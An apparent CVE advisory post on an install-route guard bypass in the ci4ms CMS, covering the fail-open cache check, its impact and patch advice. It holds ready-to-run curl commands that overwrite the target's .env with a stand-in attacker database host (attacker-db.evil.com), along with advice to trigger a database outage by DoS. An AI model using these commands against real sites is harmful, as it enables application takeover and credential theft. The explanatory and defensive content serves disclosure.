ci4ms, Install Route Guard Bypass, CVE-2024-XXXX (Critical)

Listen to this Post

How the CVE works: The install guard in ci4ms uses a volatile cache check (cache('settings')) combined with `.env` file existence to block access to the setup wizard. The `InstallFilter::before()` method requires both `.env` exists AND cache is non-empty to return a 404. The cache is populated in `app/Config/Filters.php` constructor, which runs before route filters. If the database is unreachable (connection failure, timeout), a `\Throwable` catch silently swallows the exception, leaving `cache(‘settings’)` empty. The guard then fails open, allowing unauthenticated requests to /install. The install controller processes POST without validating the `host` parameter, writing it directly to `.env` via `copyEnvFile()` and updateEnvSettings(). CSRF is disabled for all install routes. The cache has a 24-hour TTL and is cleared in 14+ admin actions, creating recurring windows. An attacker exploits a database outage coinciding with cache expiry to overwrite `.env` with attacker-controlled credentials, achieving full application takeover.

dailycve form:

Platform: ci4ms
Version: Unspecified
Vulnerability: Install guard bypass
Severity: Critical
date: 2026-04-09

Prediction: Patch within 14 days

What Undercode Say:

Check if install route accessible (expect 200 on vulnerable)
curl -s -o /dev/null -w "%{http_code}" http://target/install
Exploit: Overwrite .env with attacker DB
curl -X POST http://target/install \
-d 'host=attacker-db.evil.com' \
-d 'dbname=ci4ms' -d 'dbusername=root' \
-d 'dbpassword=pass' -d 'dbdriver=MySQLi' \
-d 'name=Admin' -d 'username=admin' \
-d 'password=Evil1234!' -d '[email protected]'
Verify .env overwritten
cat /path/to/.env | grep DB_HOST

Exploit:

Trigger database outage (e.g., DoS, maintenance window) while settings cache is empty. Send POST to `/install` with malicious `host` parameter. No CSRF token required. The application then connects to attacker’s database, and all subsequent queries are redirected.

Protection from this CVE:

Replace cache check with persistent filesystem lock. In InstallFilter::before(), check for `WRITEPATH . ‘installed.lock’` and return 404 if exists. Create lock file after successful installation. Add validation for `host` parameter: required|regex_match[/^[a-zA-Z0-9._-]+$/]. Disable install routes completely post-setup.

Impact:

Full application takeover, credential theft, data integrity loss, encryption key reset (invaliding all encrypted data and sessions). No authentication required, no user interaction, recurring exploit window every 24 hours.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top